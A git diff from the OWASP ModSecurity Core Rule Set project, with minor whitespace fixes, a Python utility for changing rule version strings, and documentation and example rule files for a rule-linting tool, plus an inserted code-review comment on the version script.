MAX_NAME_LENGTH) - strcpy(parameters[num_of_params].name,name); + strcpy(parameters[num_of_params].name,name); else continue; if (strlen(value) < MAX_VALUE_LENGTH) { - strcpy(parameters[num_of_params].value,value); + strcpy(parameters[num_of_params].value,value); num_of_params++; } } 
@@ -426,7 +426,7 @@ int send_request(char *request,char *ip,char *port,char *reply,int max_reply_siz i = 1; reply_len=0; while ( (reply_len < max_reply_size) && (i>0) ) { - i = read(sock,reply+reply_len,(max_reply_size-reply_len)<1024?(max_reply_size-reply_len):1024); + i = read(sock,reply+reply_len,(max_reply_size-reply_len)<1024?(max_reply_size-reply_len):1024); if (i > 0 ) reply_len+=i; } reply[reply_len] = '\0'; @@ -602,7 +602,7 @@ int init_cgi() setresuid(0,0,0); setresgid(0,0,0); - + strcpy(modsec_cli_home,"/opt/modsecurity-cli"); strcpy(modsec_rpc_home,"/opt/modsecurity-rpc"); strcpy(modsec_rpc_log_file,"/opt/modsecurity-rpc/var/logs/rpc.log"); diff --git a/util/av-scanning/runAV/runAV-clamd.c b/util/av-scanning/runAV/runAV-clamd.c index 83319fdcab..c3526ad819 100755 --- a/util/av-scanning/runAV/runAV-clamd.c +++ b/util/av-scanning/runAV/runAV-clamd.c @@ -15,7 +15,7 @@ main(int argc, char *argv[]) if (error != 0) { printf ("1 exec error %d: OK", error); } else if (!*output) { - printf ("1 exec empty: OK"); + printf ("1 exec empty: OK"); } else { colon = strstr(output, ":"); @@ -40,7 +40,7 @@ main(int argc, char *argv[]) else if (keyword = strstr(colon, "Can't access file ")) { printf ("0 invalid file %s", keyword+18); } - else { + else { printf ("0 unable to parse clamdscan output [%s] for cmd [%s]", output, cmd); } } diff --git a/util/av-scanning/runAV/runAV.c b/util/av-scanning/runAV/runAV.c index 1bbf763073..7d74d2e1b5 100755 --- a/util/av-scanning/runAV/runAV.c +++ b/util/av-scanning/runAV/runAV.c @@ -15,7 +15,7 @@ main(int argc, char *argv[]) if (error != 0) { printf ("1 exec error %d: OK", error); } else if (!*output) { - printf ("1 exec empty: OK"); + printf ("1 exec empty: OK"); } else { colon = strstr(output, ":"); 
@@ -40,7 +40,7 @@ main(int argc, char *argv[]) else if (keyword = strstr(colon, "Can't access file ")) { printf ("0 invalid file %s", keyword+18); } - else { + else { printf ("0 unable to parse clamscan output [%s] for cmd [%s]", output, cmd); } } diff --git a/util/change-version/README.md b/util/change-version/README.md new file mode 100644 index 0000000000..7867d3111a --- /dev/null +++ b/util/change-version/README.md 
@@ -0,0 +1,113 @@ +# Change version in CRS + +This page describes how can you change the version strings in CRS rules. + +## Goals + +The problem is change the version string in CRS rules isn't trivial. Version string used for mark all rule by the `ver` action, mark the whole file in a comment, or mark the rule set with `SecComponentSignature`. Few examples: + +* in a rule: `SecRule ARGS "foo" "id:1,phase:1,ver:'OWASP_CRS/3.3.0',pass"` +* comment: `# OWASP ModSecurity Core Rule Set ver.3.3.0` +* config directive: `SecComponentSignature "OWASP_CRS/3.3.0"` + +There are many other pattern which look-a-like version string, but that isn't it. + +The main task is replace only the real version strings by the new one. + +The Python script below helps to do that on the whole rule set or any unique file. + +## Prerequisites + +* Python3 interpreter +* [msc_pyparser](https://github.com/digitalwave/msc_pyparser) +* CRS rule set + +You can install the `msc_pyparser` through PIP - that's the recommended method, see the [instructions](https://github.com/digitalwave/msc_pyparser#installing-using-pip3). + +If you already have this package, don't forget to update it before you start the work: + +```bash +python3 -m pip install --upgrade msc_pyparser +``` + +## Usage + +The script expects three mandatory and one optional arguments: + +* input file or directory +* output **directory** +* version string for `ver` actions and `SecComponentSignature` - these are always the same +* and optionally, the version string for comments + +Please note that the input can be a single file (eg. 'coreruleset/rules/REQUEST-901-INITIALIZATION.conf' or a directory with meta name, eg 'coreruleset/rules/*.conf'. Also note that the output argument is always a **directory** where the script puts the transformed file or files. + +### Run the script + +Consider you want to change only the `ver` and `SecComponentSignature` values by a new one, eg: `OWASP_CRS/3.4.0-dev`. The current value is `OWASP_CRS/3.3.0`. 
The next command will solve this: + +```bash +mkdir /path/to/coreruleset/rules_new +$ ./change-version.py "/path/to/coreruleset/rules/*.conf" /path/to/coreruleset/rules_new "OWASP_CRS/3.4.0-dev" +Working with file: /path/to/coreruleset/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf +Working with file: /path/to/coreruleset/rules/REQUEST-903.9008-PHPMYADMIN-EXCLUSION-RULES.conf +... +Working with file: /path/to/coreruleset/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf +Working with file: /path/to/coreruleset/rules/REQUEST-912-DOS-PROTECTION.conf +``` + +The new files will placed under the `/path/to/coreruleset/rules_new`, now make a diff: + +```bash +$ for f in `ls -1 /path/to/coreruleset/rules/*.conf`; do b=`basename ${f}`; diff ${f} /path/to/coreruleset/rules_new/${b}; done +28c28 +< SecComponentSignature "OWASP_CRS/3.3.0" +--- +> SecComponentSignature "OWASP_CRS/3.4.0-dev" +61c61 +< ver:'OWASP_CRS/3.3.0',\ +--- +> ver:'OWASP_CRS/3.4.0-dev',\ +79c79 +< ver:'OWASP_CRS/3.3.0',\ +--- +> ver:'OWASP_CRS/3.4.0-dev',\ +... +``` + +As you can see, the comments have been left untouched. + +In the next example, we can replace them too: + +```bash +$ ./change-version.py "/path/to/coreruleset/rules/*.conf" /path/to/coreruleset/rules_new "OWASP_CRS/3.4.0-dev" "3.4.0-dev" +Working with file: /path/to/coreruleset/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf +Working with file: /path/to/coreruleset/rules/REQUEST-903.9008-PHPMYADMIN-EXCLUSION-RULES.conf +... 
+Working with file: /path/to/coreruleset/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf +Working with file: /path/to/coreruleset/rules/REQUEST-912-DOS-PROTECTION.conf +``` + +Run the diff again: + +```bash +$ for f in `ls -1 /path/to/coreruleset/rules/*.conf`; do b=`basename ${f}`; diff ${f} /path/to/coreruleset/rules_new/${b}; done +2c2 +< # OWASP ModSecurity Core Rule Set ver.3.3.0 +--- +> # OWASP ModSecurity Core Rule Set ver.3.4.0-dev +28c28 +< SecComponentSignature "OWASP_CRS/3.3.0" +--- +> SecComponentSignature "OWASP_CRS/3.4.0-dev" +61c61 +< ver:'OWASP_CRS/3.3.0',\ +--- +> ver:'OWASP_CRS/3.4.0-dev',\ +79c79 +< ver:'OWASP_CRS/3.3.0',\ +--- +> ver:'OWASP_CRS/3.4.0-dev',\ +... +``` + +As you can see, the version string at the end of comment line has changed in line 2. diff --git a/util/change-version/README.txt b/util/change-version/README.txt new file mode 100644 index 0000000000..984a91c576 --- /dev/null +++ b/util/change-version/README.txt 
@@ -0,0 +1,117 @@ +Change version in CRS +===================== + +This page describes how can you change the version strings in CRS rules. + + +Goals +----- +The problem is change the version string in CRS rules isn't trivial. Version +string used for mark all rule by the ver action, mark the whole file in a +comment, or mark the rule set with SecComponentSignature. Few examples: + + * in a rule: SecRule ARGS "foo" "id:1,phase:1,ver:'OWASP_CRS/3.3.0',pass" + * comment: # OWASP ModSecurity Core Rule Set ver.3.3.0 + * config directive: SecComponentSignature "OWASP_CRS/3.3.0" + +There are many other pattern which look-a-like version string, but that +isn't it. + +The main task is replace only the real version strings by the new one. + +The Python script below helps to do that on the whole rule set or any unique +file. + +Prerequisites +------------- + * Python3 interpreter + * msc_pyparser + * CRS rule set + +You can install the msc_pyparser through PIP - that's the recommended method, +see the instructions. + +If you already have this package, don't forget to update it before you start +the work: + +python3 -m pip install --upgrade msc_pyparser + + +Usage +----- +The script expects three mandatory and one optional arguments: + +* input file or directory +* output directory +* version string for ver actions and SecComponentSignature - these are always + the same and optionally, the version string for comments + +Please note that the input can be a single file (eg. +'coreruleset/rules/REQUEST-901-INITIALIZATION.conf' or a directory with meta +name, eg 'coreruleset/rules/*.conf'. Also note that the output argument is +always a directory where the script puts the transformed file or files. + +Run the script +-------------- +Consider you want to change only the ver and SecComponentSignature values by a +new one, eg: OWASP_CRS/3.4.0-dev. The current value is OWASP_CRS/3.3.0. 
The +next command will solve this: + +mkdir /path/to/coreruleset/rules_new +$ ./change-version.py "/path/to/coreruleset/rules/*.conf" /path/to/coreruleset/rules_new "OWASP_CRS/3.4.0-dev" +Working with file: /path/to/coreruleset/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf +Working with file: /path/to/coreruleset/rules/REQUEST-903.9008-PHPMYADMIN-EXCLUSION-RULES.conf +... +Working with file: /path/to/coreruleset/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf +Working with file: /path/to/coreruleset/rules/REQUEST-912-DOS-PROTECTION.conf + +The new files will placed under the /path/to/coreruleset/rules_new, now make a diff: + +$ for f in `ls -1 /path/to/coreruleset/rules/*.conf`; do b=`basename ${f}`; diff ${f} /path/to/coreruleset/rules_new/${b}; done +28c28 +< SecComponentSignature "OWASP_CRS/3.3.0" +--- +> SecComponentSignature "OWASP_CRS/3.4.0-dev" +61c61 +< ver:'OWASP_CRS/3.3.0',\ +--- +> ver:'OWASP_CRS/3.4.0-dev',\ +79c79 +< ver:'OWASP_CRS/3.3.0',\ +--- +> ver:'OWASP_CRS/3.4.0-dev',\ +... + +As you can see, the comments have been left untouched. + +In the next example, we can replace them too: + +$ ./change-version.py "/path/to/coreruleset/rules/*.conf" /path/to/coreruleset/rules_new "OWASP_CRS/3.4.0-dev" "3.4.0-dev" +Working with file: /path/to/coreruleset/rules/REQUEST-903.9005-CPANEL-EXCLUSION-RULES.conf +Working with file: /path/to/coreruleset/rules/REQUEST-903.9008-PHPMYADMIN-EXCLUSION-RULES.conf +... 
+Working with file: /path/to/coreruleset/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf +Working with file: /path/to/coreruleset/rules/REQUEST-912-DOS-PROTECTION.conf + +Run the diff again: + +$ for f in `ls -1 /path/to/coreruleset/rules/*.conf`; do b=`basename ${f}`; diff ${f} /path/to/coreruleset/rules_new/${b}; done +2c2 +< # OWASP ModSecurity Core Rule Set ver.3.3.0 +--- +> # OWASP ModSecurity Core Rule Set ver.3.4.0-dev +28c28 +< SecComponentSignature "OWASP_CRS/3.3.0" +--- +> SecComponentSignature "OWASP_CRS/3.4.0-dev" +61c61 +< ver:'OWASP_CRS/3.3.0',\ +--- +> ver:'OWASP_CRS/3.4.0-dev',\ +79c79 +< ver:'OWASP_CRS/3.3.0',\ +--- +> ver:'OWASP_CRS/3.4.0-dev',\ +... + +As you can see, the version string at the end of comment line has changed in line 2. diff --git a/util/change-version/change-version.py b/util/change-version/change-version.py new file mode 100755 index 0000000000..6e39a8e716 --- /dev/null +++ b/util/change-version/change-version.py 
@@ -0,0 +1,105 @@ +#!/usr/bin/env python3 + +import sys +import glob +import msc_pyparser +import os.path +import re + +class FileTransform(object): + def __init__(self, data): + self.data = data + self.cverpatt = "ver\.\d+\.\d+\.\d+$" + self.re_cverpatt = re.compile(self.cverpatt) + + def change_version(self, version, cversion): + # iterate through AST items + # self.data: the parsed structure + for d in self.data: + # id the item has 'actions' then we can check the 'ver' key + if "actions" in d: + aidx = 0 + while aidx < len(d['actions']): + a = d['actions'][aidx] + # if we found one, replace the value + if a['act_name'] == "ver": + a['act_arg'] = version + aidx += 1 + else: + # replace SecComponentSignature by same version string + if d['type'].lower() == "seccomponentsignature": + d['arguments'][0]['argument'] = version + + # replace the versions in comments if cversion exists + if cversion is not None: + if d['type'].lower() == "comment" and self.re_cverpatt.search(d['argument']): + d['argument'] = re.sub(self.cverpatt, "ver.%s" % (cversion), d['argument']) + +class FileHandler(object): + def __init__(self, **kwargs): + for key, value in kwargs.items(): + setattr(self, key, value) + if not hasattr(self, 'cversion'): + self.cversion = None + + self.output = self.output.rstrip("/") + "/" + + # iterate through the list of files + for f in glob.glob(self.input): + print(f"Working with file: %s" % (f)) + # read the file content + try: + with open(f) as file: + data = file.read() + except: + print("Exception caught - ", sys.exc_info()) + sys.exit(1) + + # build AST from content + try: + mparser = msc_pyparser.MSCParser() + mparser.parser.parse(data) + except: + print(sys.exc_info()[1]) + sys.exit(1) + + # change version and comment version if exists + try: + t = FileTransform(mparser.configlines) + t.change_version(self.version, self.cversion) + except: + print(sys.exc_info()[1]) + sys.exit(1) + + # save the new file + try: + mwriter = 
msc_pyparser.MSCWriter(mparser.configlines) + output = os.path.join(self.output, os.path.basename(f).lstrip("/")) + with open(output, "w") as file: + mwriter.generate() + # add extra new line at the end of file + mwriter.output.append("") + file.write("\n".join(mwriter.output)) + except: + print("Exception caught - ", sys.exc_info()) + sys.exit(1) + +if len(sys.argv) < 4: + print("Argument missing!") + print("Use: %s rule.conf /path/to/output/directory version" % sys.argv[0]) + print(" %s \"/path/to/rules/*.conf\" /path/to/output/directory version [comment_version]" % sys.argv[0]) + print("Example:") + print(" mkdir ../../rulestmp") + print(" %s \"../../rules/*.conf\" ../../rulestmp \"OWASP_CRS/3.4.0-dev\" \"3.4.0-dev\"" % sys.argv[0]) + sys.exit(1) + +args = { + 'input' : sys.argv[1], + 'output' : sys.argv[2], + 'version' : sys.argv[3] +} + +if len(sys.argv) > 4: + args['cversion'] = sys.argv[4] + +fh = FileHandler(**args) diff --git a/util/crs-rules-check/CHANGES b/util/crs-rules-check/CHANGES new file mode 100644 index 0000000000..109d221f12 --- /dev/null +++ b/util/crs-rules-check/CHANGES @@ -0,0 +1,3 @@ +v0.1 - 2021-12-02 +----------------- + * Initial release diff --git a/util/crs-rules-check/README.md b/util/crs-rules-check/README.md new file mode 100644 index 0000000000..8688f1b200 --- /dev/null +++ b/util/crs-rules-check/README.md 
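Review bot: The comment-version pattern set in FileTransform.__init__ is a plain string literal containing `\.` and `\d`, which Python treats as invalid escape sequences (a DeprecationWarning up to 3.11 and a SyntaxWarning from 3.12); it should be a raw string, `self.cverpatt = r"ver\.\d+\.\d+\.\d+$"`. The bare `except:` clauses in FileHandler.__init__ also catch SystemExit and KeyboardInterrupt, so an interrupted run is reported as "Exception caught" and converted to exit status 1; `except Exception:` keeps the intended error reporting without masking interrupts. In the save step the output file is opened with `"w"` before `mwriter.generate()` runs, so a generation failure leaves a truncated file behind in the output directory; calling `generate()` before `open(output, "w")` avoids that. Minor style point: `print(f"Working with file: %s" % (f))` mixes an f-string prefix with %-formatting; `print(f"Working with file: {f}")` says the same thing.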
@@ -0,0 +1,418 @@ +crs_rules_check +=============== + +Welcome to the `crs_rules_check` documentation. + +Prerequisites +============= + +To run the tool, you need: + ++ a **Python 3** interpreter ++ **msc_pyparser** - a SecRule parser (>=1.2.1) + +`msc_pyparser` was written in Python 3 and has not been tested with Python 2, therefore you have to use Python 3. + +The best way to install the required packages just run + +``` +pip3 install -r requirements.txt +``` + +How does it work +================ + +The script expects an argument at least - this would be a single file or a file list, eg: `/path/to/coreruleset/*.conf`. + +First, an attempt is made to parse each file specified on the command line. This is a "pre-check", and runs on all files before the other tests. + * **Parsing check** - try to parse the structure, this is a syntax check + **note**: this script is a bit more strict than mod_security. There are some cases, where mod_security allows the syntax, but [msc_pyparser](https://github.com/digitalwave/msc_pyparser/) not. + +Second, the script loops over each of the parsed structures. Each iteration consists of the following steps: + * **Casing check** - checks operators, actions, transformations and ctl names for proper casing + e.g., `@beginsWith` is allowed, `@beginswith` is not. In this step, the script also ensures that an operator is present, eg `SecRule ARGS "^.*"` isn't allowed without `@rx` operator. + * **Action order check** - This step verifies that actions are specified in the correct order - [see the wiki](https://github.com/coreruleset/coreruleset/wiki/Order-of-ModSecurity-Actions-in-CRS-rules) + * **Format check** CRS has a good reference for [indentation](https://github.com/coreruleset/coreruleset/blob/v3.4/dev/CONTRIBUTING.md#general-formatting-guidelines-for-rules-contributions) and other formatting. `msc_pyparser` follows these rules when it creates the config file(s) from parsed structure(s). 
After the re-build is done, it runs a compare between the original file and the built one with help of `difflib`. The script reports all non-compliant formatting. + **Note**, that `difflib` is a part of the standard Python library, you don't need to install it. + * **Deprecation check** - This step checks for use of deprecated features. The following features are deprecated: + * `ctl:auditLogParts` [is no longer supported by CRS](https://github.com/coreruleset/coreruleset/pull/3090) + * **Duplicate ID's check** - This step checks that each rule has a unique ID. + * **paranoia-level/N tag and its value** - This step checks that the `paranoia-level/N` tag is present when required and whether it has the correct value `N` for its context. Specifically: + * if a rule is activated for a specific paranoia level `L` and does not have the `nolog` action, the `paranoia-level/N` tag **must** be set and the value of `N` **must** be `L` + * if a rule is activated outside of any paranoia level, or has the `nolog` action, the `paranoia-level/N` tag **must not** be set + * **Anomaly scoring check** - This step checks that rules are configured properly for the anomaly scoring mechanism: + * every rule must update the correct scoring variable with the correct severity related score, for example: `setvar:inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}` + * every rule must update the correct scoring variable with the correct severity related score, for example: `setvar:inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}` + * **Initialization of used transaction (TX) variables** - all used TX variables **must** be initialised before their first use. 
Using a TX variable means one of the following: + * the variable is a target of a rule, e.g., `SecRule TX.foo ...` + * the variable is an operator argument, eg `SecRule ARGS "@rx %{TX.foo}"...` + * the variable is a right hand side operand in a `setvar` action, eg `setvar:tx.bar=%{tx.foo}` + * the variable is in an expansion, e.g., as part of the value of a `msg` action: `msg:'Current value of variable: %{tx.foo}` +* **Check rule tags** - only tags listed in `util/APPROVED_TAGS` may be used as tags in rules + * to use a new tag on a rule, it **must** first be registered in the util/APPROVED_TAGS file + +Finally, the script prints a report of all unused TX variables. Usually, unused TX variables occur when a rule creates a TX variable (e.g., `setvar:tx.foo=1`) but the value of the variable is never used anywhere else. This will only be revealed after the script has checked all rules. + + +If script finds any parser error, it stops immediately. In case of other error, shows it (rule-by-rule). Finally, the script returns a non-zero value. + +If everything is fine, rule returns with 0. + +Normally, you should run the script: + +``` +./util/crs-rules-check/rules-check.py -r crs-setup.conf.example -r rules/*.conf +``` + +Optionally, you can add the option `--output=github` (default value is `native`): + +``` +./util/crs-rules-check/rules-check.py --output=github -r crs-setup.conf.example -r rules/*.conf +``` + +In this case, each line will have a prefix, which could be `::debug` or `::error`. See [this](https://docs.github.com/en/actions/using-workflows/workflow-commands-for-github-actions#setting-an-error-message). + +Examples +======== + +To run these samples, see the files in `examples` directory. 
+ +### Test 1 - syntax check + +``` +SecRule &ARGS_GET "@eq 3" \ + "id:1,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + chain + SecRule ARGS_GET:foo "@rx bar" \ + "t:none,t:urlDecodeUni,t:lowercase,\ + setvar:'tx.some_vars=1' +``` + +As you can see, there are two `"` missing above: the first one after the `chain`, and the other one from the end of the chained rule. Mod_security allows this, but this isn't well formed. (See [#2184](https://github.com/coreruleset/coreruleset/pull/2184)) + +Check it: + +``` +$ ./rules-check.py -r examples/test1.conf +Config file: examples/test1.conf +Can't parse config file: examples/test1.conf + file=examples/test1.conf, line=8, endLine=8, title=Parser error: can't parse file +$ echo $? +1 +``` + +### Test 2 - case sensitive test + +``` +SecRule REQUEST_URI "@beginswith /index.php" \ + "id:1,\ + phase:1,\ + deny,\ + t:none,\ + nolog" +``` + +In this rule the operator is lowercase. Mod_security allows both form. + +``` +$ ./rules-check.py -r examples/test2.conf +Config file: examples/test2.conf + Parsing ok. + Ignore case check found error(s) + file=examples/test2.conf, line=1, endLine=1, title=Case check: Operator case mismatch: @beginswith (rule: 1) + Action order check ok. + Indentation check ok. +$ echo $? +1 +``` + +### Test 3 - wrong action ordering + +``` +SecRule REQUEST_URI "@beginsWith /index.php" \ + "phase:1,\ + id:1,\ + deny,\ + t:none,\ + nolog" +``` + +In this rule, the `phase` and `id` are interchanged. As [documentation](https://github.com/coreruleset/coreruleset/wiki/Order-of-ModSecurity-Actions-in-CRS-rules) says, the first action **must** be the `id`, the second one is the `phase`. + +``` +$ ./rules-check.py -r examples/test3.conf +Config file: examples/test3.conf + Parsing ok. + Ignore case check ok. + Action order check found error(s) + file=examples/test3.conf, line=3, endLine=3, title=Action order check: action 'phase' at pos 0 is wrong place against 'id' at pos 1 (rule: 1) + Indentation check ok. +$ echo $? 
+1 +``` + +### Test 4 - wrong indentation + +``` + SecRule ARGS "@rx foo" \ + "id:1,\ + phase:1,\ + pass,\ + nolog" + +SecRule ARGS "@rx foo" \ + "id:2,\ + phase:1,\ + pass,\ + nolog" + +SecRule ARGS "@rx foo" \ + "id:3,\ + phase:1,\ + pass,\ + nolog" +``` + +In this rule set, the first line and the rule with `id:3` first action have an extra leading space. As [documentation](https://github.com/coreruleset/coreruleset/blob/v3.4/dev/CONTRIBUTING.md#general-formatting-guidelines-for-rules-contributions) describes, CRS has a strict indentation rules. The script checks the indentation with help of Python's [difflib](https://docs.python.org/3.9/library/difflib.html). + +``` +$ ./rules-check.py -r examples/test4.conf +Config file: examples/test4.conf + Parsing ok. + Ignore case check ok. + Action order check ok. + Indentation check found error(s) +--- ++++ + file=examples/test4.conf, line=1, endLine=6, title=Indentation error: an indetation error has found +@@ -1,5 +1,5 @@ +- SecRule ARGS "@rx foo" \ +- "id:1,\ ++SecRule ARGS "@rx foo" \ ++ "id:1,\ + phase:1,\ + pass,\ + nolog" + file=examples/test4.conf, line=11, endLine=18, title=Indentation error: an indetation error has found +@@ -11,7 +11,7 @@ + nolog" + + SecRule ARGS "@rx foo" \ +- "id:3,\ ++ "id:3,\ + phase:1,\ + pass,\ + nolog" +``` + +### Test 5 - empty (implicit @rx) operator + +``` +SecRule REQUEST_URI "index.php" \ + "phase:1,\ + id:1,\ + deny,\ + t:none,\ + nolog" +``` + +In this rule, the operator is missing. As [ModSecurity documentation](https://github.com/SpiderLabs/ModSecurity/wiki/Reference-Manual-(v2.x)#rx) says "the rules that do not explicitly specify an operator default to @rx". In CRS, this isn't allowed. + +``` +$ ./rules-check.py -r examples/test5.conf +Config file: examples/test5.conf + Parsing ok. + Ignore case check found error(s) + file=examples/test5.conf, line=1, endLine=1, title=Case check: Empty operator isn't allowed (rule: 1) + Action order check ok. + Indentation check ok. +$ echo $? 
+1 +``` + +### Test 6 - check that rule does not contain 'ctl:auditLogParts' + +``` +SecRule TX:sql_error_match "@eq 1" \ + "id:1,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + ctl:auditLogParts=+E" +``` + +The `ctl:auditLogParts=+E` (or any kind of `ctl:auditLogParts`) is not allowed in CRS. + +See the CRS PR [#3034](https://github.com/coreruleset/coreruleset/pull/3034) + +``` +$ util/crs-rules-check/rules-check.py -r util/crs-rules-check/examples/test6.conf +Config file: util/crs-rules-check/examples/test6.conf + Parsing ok. + Ignore case check ok. + Action order check ok. + Indentation check ok. + Found 'ctl:auditLogParts' action is in wrong place. + file=util/crs-rules-check/examples/test6.conf, line=7, endLine=7, title='ctl:auditLogParts' action in wrong place: action can only be placed in last part of a chained rule (rule: 1) +$ echo $? +1 +``` + +### Test 7 - check duplicate id's + +``` +SecRule ARGS "@rx foo" \ + "id:1001,\ + phase:2,\ + block,\ + capture,\ + t:none" + +SecRule ARGS_NAMES "@rx bar" \ + "id:1001,\ + phase:2,\ + block,\ + capture,\ + t:none" +``` + +In this rule file, there are two rules with same `id`. + +``` +$ util/crs-rules-check/rules-check.py -r util/crs-rules-check/examples/test7.conf +Config file: util/crs-rules-check/examples/test7.conf + Parsing ok. +Checking parsed rules... +util/crs-rules-check/examples/test7.conf + Ignore case check ok. + Action order check ok. + Indentation check ok. + 'ctl:auditLogParts' actions are in right place. + Found duplicated id('s) + file=util/crs-rules-check/examples/test7.conf, line=10, endLine=10, title='id' is duplicated: id 1001 is duplicated, previous place: util/crs-rules-check/examples/test7.conf:3 + paranoia-level tags are correct. + PL anomaly_scores are correct. + All TX variables are set +End of checking parsed rules +$ echo $? 
+1 +``` + +### Test 8 - paranoia-level consitency check + +``` +SecRule &TX:blocking_paranoia_level "@eq 0" \ + "id:901120,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc1',\ + setvar:'tx.blocking_paranoia_level=1'" + +SecRule &TX:detection_paranoia_level "@eq 0" \ + "id:901125,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc1',\ + setvar:'tx.detection_paranoia_level=%{TX.blocking_paranoia_level}'" + +SecRule &TX:error_anomaly_score "@eq 0" \ + "id:901141,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc1',\ + setvar:'tx.error_anomaly_score=4'" + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920011,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920012,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" + +SecRule REQUEST_HEADERS:Content-Length "!@rx ^\d+$" \ + "id:920160,\ + phase:1,\ + block,\ + t:none,\ + tag:'paranoia-level/2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" + +SecRule REQUEST_HEADERS:Content-Length "!@rx ^\d+$" \ + "id:920161,\ + phase:1,\ + block,\ + t:none,\ + tag:'paranoia-level/1',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" + +SecRule REQUEST_HEADERS:Content-Length "!@rx ^\d+$" \ + "id:920162,\ + phase:1,\ + block,\ + t:none,\ + tag:'paranoia-level/1',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +SecMarker "END-REQUEST-920-PROTOCOL-ENFORCEMENT" + +``` + +In this rule file, there are more problems: +* rule 920160 is activated on PL1, but the `tag` value is PL2 +* at rule 920160, the TX variable gets error_anomaly_score, but the severity is CRITICAL +* at rule 920161 there is no severity action +* rule 920162 increments anomaly_score_pl2, but it's in PL1 + +``` +$ ./rules-check.py -r examples/test8.conf +Config file: examples/test8.conf + Parsing ok. +Checking parsed rules... 
+examples/test8.conf + Ignore case check ok. + Action order check ok. + Indentation check ok. + 'ctl:auditLogParts' actions are in right place. + no duplicate id's + Found incorrect paranoia-level/N tag(s) + file=examples/test8.conf, line=34, endLine=34, title=wrong or missing paranoia-level/N tag: tag 'paranoia-level/2' on PL 1, rule id: 920160 + Found incorrect (inbound|outbout)_anomaly_score value(s) + file=examples/test8.conf, line=36, endLine=36, title=wrong (inbound|outbout)_anomaly_score variable or value: invalid value for anomaly_score_pl1: tx.error_anomaly_score with severity critical, rule id: 920160 + file=examples/test8.conf, line=44, endLine=44, title=wrong (inbound|outbout)_anomaly_score variable or value: missing severity action, rule id: 920161 + file=examples/test8.conf, line=53, endLine=53, title=wrong (inbound|outbout)_anomaly_score variable or value: variable inbound_anomaly_score_pl2 on PL 1, rule id: 920162 + There are one or more unset TX variables. + file=examples/test8.conf, line=53, endLine=53, title=unset TX variable: TX variable 'critical_anomaly_score' not set / later set (rvar) in rule 920162 +End of checking parsed rules +Cumulated report about unused TX variables + No unused TX variable +$ echo $? +1 +``` + +### Test 9 - check state of used TX variables + + +``` +SecRule TX:foo "@rx bar" \ + "id:1001,\ + phase:1,\ + pass,\ + nolog" + +SecRule ARGS "@rx ^.*$" \ + "id:1002,\ + phase:1,\ + pass,\ + nolog,\ + setvar:tx.bar=1" +``` + +In this rule file, there are more problems: +* rule 1001 used an uninitialized variable (`TX:foo`) +* rule 1002 sets a TX variable which never used diff --git a/util/crs-rules-check/TODO.txt b/util/crs-rules-check/TODO.txt new file mode 100644 index 0000000000..578a70d6ed --- /dev/null +++ b/util/crs-rules-check/TODO.txt @@ -0,0 +1,5 @@ + +* Add more checks + * check 'mandatory' actions, eg. `phase` + * check existing of necessary `tag`, eg. `OWASP_CRS/$$VER$$` + * check existing of `ver` action 
diff --git a/util/crs-rules-check/examples/test1.conf b/util/crs-rules-check/examples/test1.conf new file mode 100644 index 0000000000..3366b13a51 --- /dev/null +++ b/util/crs-rules-check/examples/test1.conf @@ -0,0 +1,10 @@ +SecRule &ARGS_GET "@eq 3" \ + "id:1,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + chain + SecRule ARGS_GET:foo "@rx bar" \ + "t:none,t:urlDecodeUni,t:lowercase,\ + setvar:'tx.some_vars=1' diff --git a/util/crs-rules-check/examples/test2.conf b/util/crs-rules-check/examples/test2.conf new file mode 100644 index 0000000000..7b7d4eab97 --- /dev/null +++ b/util/crs-rules-check/examples/test2.conf @@ -0,0 +1,6 @@ +SecRule REQUEST_URI "@beginswith /index.php" \ + "id:1,\ + phase:1,\ + deny,\ + t:none,\ + nolog" diff --git a/util/crs-rules-check/examples/test3.conf b/util/crs-rules-check/examples/test3.conf new file mode 100644 index 0000000000..2cd9d44e10 --- /dev/null +++ b/util/crs-rules-check/examples/test3.conf @@ -0,0 +1,6 @@ +SecRule REQUEST_URI "@beginsWith /index.php" \ + "phase:1,\ + id:1,\ + deny,\ + t:none,\ + nolog" diff --git a/util/crs-rules-check/examples/test4.conf b/util/crs-rules-check/examples/test4.conf new file mode 100644 index 0000000000..00bc8374ab --- /dev/null +++ b/util/crs-rules-check/examples/test4.conf @@ -0,0 +1,17 @@ + SecRule ARGS "@rx foo" \ + "id:1,\ + phase:1,\ + pass,\ + nolog" + +SecRule ARGS "@rx foo" \ + "id:2,\ + phase:1,\ + pass,\ + nolog" + +SecRule ARGS "@rx foo" \ + "id:3,\ + phase:1,\ + pass,\ + nolog" diff --git a/util/crs-rules-check/examples/test5.conf b/util/crs-rules-check/examples/test5.conf new file mode 100644 index 0000000000..22638f3478 --- /dev/null +++ b/util/crs-rules-check/examples/test5.conf @@ -0,0 +1,6 @@ +SecRule REQUEST_URI "index.php" \ + "id:1,\ + phase:1,\ + deny,\ + t:none,\ + nolog" diff --git a/util/crs-rules-check/examples/test6.conf b/util/crs-rules-check/examples/test6.conf new file mode 100644 index 